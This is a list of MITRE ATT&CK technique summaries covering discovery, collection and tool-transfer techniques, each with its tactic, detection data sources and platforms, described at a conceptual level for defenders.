Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre